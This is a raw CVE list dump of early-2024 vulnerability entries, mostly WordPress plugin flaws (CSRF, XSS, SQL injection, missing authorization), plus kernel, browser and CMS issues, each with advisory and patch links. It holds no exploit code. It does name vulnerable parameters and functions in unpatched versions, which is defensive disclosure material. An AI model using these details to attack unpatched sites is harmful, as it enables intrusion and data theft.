MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/19a5a9f3-637c-42af-9775-5651a14cf516?source=cve    Assigned (20240116)
CVE    2024    624    Candidate    The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139   |   URL:https://plugins.trac.wordpress.org/browser/paid-memberships-pro/trunk/includes/services.php#L139   |   MISC:https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php   |   URL:https://plugins.trac.wordpress.org/changeset/3025164/paid-memberships-pro/tags/2.12.8/includes/services.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ae68d083-b6e2-409b-8c91-d4eb7e62dba9?source=cve    Assigned (20240116)
CVE    2024    623    Candidate    The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023842%40vk-block-patterns&new=3023842%40vk-block-patterns&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/9af6c319-7660-4368-b2f8-1ed1d01ee73a?source=cve    Assigned (20240116)
CVE    2024    622    Candidate    Local privilege escalation vulnerability affects OpenText Operations Agent product versions 12.15 and 12.20-12.25 when installed on Non-Windows platforms. The vulnerability could allow local privilege escalation.    MISC:https://portal.microfocus.com/s/article/KM000026555?language=en_US   |   URL:https://portal.microfocus.com/s/article/KM000026555?language=en_US    Assigned (20240116)
CVE    2024    621    Candidate    The Simple Share Buttons Adder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 8.4.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset/3032350/   |   URL:https://plugins.trac.wordpress.org/changeset/3032350/   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032350%40simple-share-buttons-adder&new=3032350%40simple-share-buttons-adder&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/93ab9f1a-26ce-466a-a5d3-d2046ec8f94d?source=cve    Assigned (20240116)
CVE    2024    620    Candidate    The PPWP – Password Protect Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.9 via API. This makes it possible for unauthenticated attackers to obtain post titles, IDs, slugs as well as other information including for password-protected posts.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032733%40password-protect-page%2Ftrunk&old=3010000%40password-protect-page%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/41299927-2ed9-4cbe-b2b0-f306dc0e4a58?source=cve    Assigned (20240116)
CVE    2024    618    Candidate    The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://advisory.abay.sh/cve-2024-0618/   |   URL:https://advisory.abay.sh/cve-2024-0618/   |   MISC:https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php   |   URL:https://plugins.trac.wordpress.org/changeset/3022938/fluentform/tags/5.1.7/app/Helpers/Helper.php?old=3000676&old_path=fluentform%2Ftags%2F5.1.5%2Fapp%2FHelpers%2FHelper.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0348d465-f351-4c52-b293-8b3b058292b9?source=cve    Assigned (20240116)
CVE    2024    617    Candidate    The Category Discount Woocommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpcd_save_discount() function in all versions up to, and including, 4.12. This makes it possible for unauthenticated attackers to modify product category discounts that could lead to loss of revenue.    MISC:https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171   |   URL:https://plugins.trac.wordpress.org/browser/woo-product-category-discount/trunk/cd-admin.php#L171   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026242%40woo-product-category-discount&new=3026242%40woo-product-category-discount&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/996b44bb-d1e0-4f82-b8ee-a98b0ae994f9?source=cve    Assigned (20240116)
CVE    2024    616    Candidate    The Passster – Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.6.2 via API. This makes it possible for unauthenticated attackers to obtain post titles, slugs, IDs, content and other metadata including passwords of password-protected posts and pages.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3032195%40content-protector%2Ftrunk&old=3020439%40content-protector%2Ftrunk&sfp_email=&sfph_mail=#file3   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/00b81467-8d00-4816-895a-89d67c541c17?source=cve    Assigned (20240116)
CVE    2024    614    Candidate    The Events Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 6.4.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://advisory.abay.sh/cve-2024-0614   |   URL:https://advisory.abay.sh/cve-2024-0614   |   MISC:https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php   |   URL:https://plugins.trac.wordpress.org/changeset/3042128/events-manager/trunk/admin/em-options.php?old=2769385&old_path=events-manager/trunk/admin/em-options.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6288fddf-926f-4506-94de-696e0a23766d?source=cve    Assigned (20240116)
CVE    2024    612    Candidate    The Content Views – Post Grid, Slider, Accordion (Gutenberg Blocks and Shortcode) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset/3024861/   |   URL:https://plugins.trac.wordpress.org/changeset/3024861/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/aa4377a8-bcf4-45ba-824b-3505bd8e8c61?source=cve    Assigned (20240116)
CVE    2024    611    Candidate    The Master Slider – Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slides callback functionality in all versions up to, and including, 3.9.5. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://advisory.abay.sh/cve-2024-0611   |   URL:https://advisory.abay.sh/cve-2024-0611   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6e587c-59b2-4f93-ab88-5e548b52db45?source=cve    Assigned (20240116)
CVE    2024    610    Candidate    The Piraeus Bank WooCommerce Payment Gateway plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'MerchantReference' parameter in all versions up to, and including, 1.6.5.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3035641%40woo-payment-gateway-for-piraeus-bank&new=3035641%40woo-payment-gateway-for-piraeus-bank&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f17c4748-2a95-495c-ad3b-86b272855791?source=cve    Assigned (20240116)
CVE    2024    607    Candidate    A flaw was found in the Netfilter subsystem in the Linux kernel. The issue is in the nft_byteorder_eval() function, where the code iterates through a loop and writes to the `dst` array. On each iteration, 8 bytes are written, but `dst` is an array of u32, so each element only has space for 4 bytes. That means every iteration overwrites part of the previous element corrupting this array of u32. This flaw allows a local user to cause a denial of service or potentially break NetFilter functionality.    MISC:RHBZ#2258635   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258635   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0607   |   URL:https://access.redhat.com/security/cve/CVE-2024-0607   |   MISC:https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63   |   URL:https://github.com/torvalds/linux/commit/c301f0981fdd3fd1ffac6836b423c4d7a8e0eb63    Assigned (20240116)
CVE    2024    606    Candidate    An attacker could execute unauthorized script on a legitimate site through UXSS using window.open() by opening a javascript URI leading to unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1855030   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1855030   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-03/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-03/    Assigned (20240116)
CVE    2024    605    Candidate    Using a javascript: URI with a setTimeout race condition, an attacker can execute unauthorized scripts on top origin sites in urlbar. This bypasses security measures, potentially leading to arbitrary code execution or unauthorized actions within the user's loaded webpage. This vulnerability affects Focus for iOS < 122.    MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1855575   |   URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1855575   |   MISC:https://www.mozilla.org/security/advisories/mfsa2024-03/   |   URL:https://www.mozilla.org/security/advisories/mfsa2024-03/    Assigned (20240116)
CVE    2024    604    Candidate    The Best WordPress Gallery Plugin – FooGallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://advisory.abay.sh/cve-2024-0604   |   URL:https://advisory.abay.sh/cve-2024-0604   |   MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Ffoogallery%2Ftags%2F2.4.7&old=3035688&new_path=%2Ffoogallery%2Ftags%2F2.4.9&new=3035688&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d17d9610-d0fd-419d-a7ea-e9c313f1c542?source=cve    Assigned (20240116)
CVE    2024    603    Candidate    A vulnerability classified as critical has been found in ZhiCms up to 4.0. This affects an unknown part of the file app/plug/controller/giftcontroller.php. The manipulation of the argument mylike leads to deserialization. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250839.    MISC:https://note.zhaoj.in/share/n3QsNbORUR0e   |   URL:https://note.zhaoj.in/share/n3QsNbORUR0e   |   MISC:https://vuldb.com/?ctiid.250839   |   URL:https://vuldb.com/?ctiid.250839   |   MISC:https://vuldb.com/?id.250839   |   URL:https://vuldb.com/?id.250839    Assigned (20240116)
CVE    2024    602    Candidate    The YARPP – Yet Another Related Posts Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.30.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://advisory.abay.sh/cve-2024-0602   |   URL:https://advisory.abay.sh/cve-2024-0602   |   MISC:https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php   |   URL:https://plugins.trac.wordpress.org/changeset/3037032/yet-another-related-posts-plugin/tags/5.30.10/includes/yarpp_options.php?old=2999784&old_path=yet-another-related-posts-plugin/tags/5.30.9/includes/yarpp_options.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/10aa1dd7-f909-4ebe-b29b-2f2743b3e08a?source=cve    Assigned (20240116)
CVE    2024    601    Candidate    A vulnerability was found in ZhongFuCheng3y Austin 1.0. It has been rated as critical. Affected by this issue is the function getRemoteUrl2File of the file src\main\java\com\java3y\austin\support\utils\AustinFileUtils.java of the component Email Message Template Handler. The manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250838 is the identifier assigned to this vulnerability.    MISC:https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md   |   URL:https://github.com/biantaibao/Austin_SSRF/blob/main/SSRF.md   |   MISC:https://vuldb.com/?ctiid.250838   |   URL:https://vuldb.com/?ctiid.250838   |   MISC:https://vuldb.com/?id.250838   |   URL:https://vuldb.com/?id.250838    Assigned (20240116)
CVE    2024    599    Candidate    A vulnerability was found in Jspxcms 10.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file src\main\java\com\jspxcms\core\web\back\InfoController.java of the component Document Management Page. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250837 was assigned to this vulnerability.    MISC:https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/Jspxcms.pdf   |   MISC:https://vuldb.com/?ctiid.250837   |   URL:https://vuldb.com/?ctiid.250837   |   MISC:https://vuldb.com/?id.250837   |   URL:https://vuldb.com/?id.250837    Assigned (20240116)
CVE    2024    597    Candidate    The SEO Plugin by Squirrly SEO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to and including 12.3.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset/3023398/   |   URL:https://plugins.trac.wordpress.org/changeset/3023398/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a61a8d8b-f22f-4a16-95f6-6cf52cf545ad?source=cve    Assigned (20240116)
CVE    2024    596    Candidate    The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the editor_html() function in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to view password protected and draft posts.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve    Assigned (20240116)
CVE    2024    595    Candidate    The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpas_get_users() function hooked via AJAX in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve user data such as emails.    MISC:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765   |   URL:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve    Assigned (20240116)
CVE    2024    594    Candidate    The Awesome Support – WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to union-based SQL Injection via the 'q' parameter of the wpas_get_users action in all versions up to, and including, 6.1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279   |   URL:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L1279   |   MISC:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765   |   URL:https://plugins.trac.wordpress.org/browser/awesome-support/trunk/includes/functions-user.php#L765   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve    Assigned (20240116)
CVE    2024    593    Candidate    The Simple Job Board plugin for WordPress is vulnerable to unauthorized access of data due to insufficient authorization checking on the fetch_quick_job() function in all versions up to, and including, 2.10.8. This makes it possible for unauthenticated attackers to fetch arbitrary posts, which can be password protected or private and contain sensitive information.    MISC:https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php   |   URL:https://plugins.trac.wordpress.org/changeset/3038476/simple-job-board/trunk/includes/class-simple-job-board-ajax.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a28a161-3dbc-4ef0-a2ce-4c102cf3cbb0?source=cve    Assigned (20240116)
CVE    2024    592    Candidate    The Related Posts for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the handle_create_link() function. This makes it possible for unauthenticated attackers to add related posts to other posts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This ultimately makes it possible for attackers to view draft and password protected posts.    MISC:https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70   |   URL:https://plugins.trac.wordpress.org/browser/related-posts-for-wp/trunk/classes/hooks/class-hook-link-related-screen.php#L70   |   MISC:https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php   |   URL:https://plugins.trac.wordpress.org/changeset/3049719/related-posts-for-wp/tags/2.2.2/classes/hooks/class-hook-link-related-screen.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5d21aad7-dbee-4204-afbd-0a5fdeaca50e?source=cve    Assigned (20240116)
CVE    2024    591    Candidate    The wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'A' parameter in all versions up to, and including, 3.4.2.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/   |   URL:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/   |   MISC:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php   |   URL:https://plugins.svn.wordpress.org/wpdatatables/trunk/lib/phpoffice/phpspreadsheet/samples/Basic/45_Quadratic_equation_solver.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037741%40wpdatatables&new=3037741%40wpdatatables&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5a679863-3c22-4d34-9994-1f8ec121ad86?source=cve    Assigned (20240116)
CVE    2024    590    Candidate    The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3036293%40microsoft-clarity&new=3036293%40microsoft-clarity&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c2f4461b-1373-4d09-8430-14d1961e1644?source=cve    Assigned (20240116)
CVE    2024    589    Candidate    Cross-site scripting (XSS) vulnerability in the entry overview tab in Devolutions Remote Desktop Manager 2023.3.36 and earlier on Windows allows an attacker with access to a data source to inject a malicious script via a specially crafted input in an entry.    MISC:https://devolutions.net/security/advisories/DEVO-2024-0001/   |   URL:https://devolutions.net/security/advisories/DEVO-2024-0001/    Assigned (20240116)
CVE    2024    587    Candidate    The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'disqus_name' parameter in all versions up to, and including, 1.0.92.1 due to insufficient input sanitization and output escaping on the executed JS file. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html   |   URL:https://plugins.trac.wordpress.org/changeset/3024147/accelerated-mobile-pages/trunk/includes/disqus.html   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/85ca96a6-7992-424b-8b88-9a0751925223?source=cve    Assigned (20240116)
CVE    2024    586    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Login/Register Element in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the custom login URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php   |   URL:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Login_Register.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c00ff4bd-d846-4e3f-95ed-2a6430c47ebf?source=cve    Assigned (20240116)
CVE    2024    585    Candidate    The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery widget in all versions up to, and including, 5.9.4 due to insufficient input sanitization and output escaping on the Image URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php   |   URL:https://plugins.trac.wordpress.org/changeset/3022852/essential-addons-for-elementor-lite/tags/5.9.5/includes/Elements/Filterable_Gallery.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/417baa1c-29f0-4fec-8008-5b52359b3328?source=cve    Assigned (20240116)
CVE    2024    584    Candidate    ** REJECT ** Do not use this CVE as it is duplicate of CVE-2023-6932        Assigned (20240116)
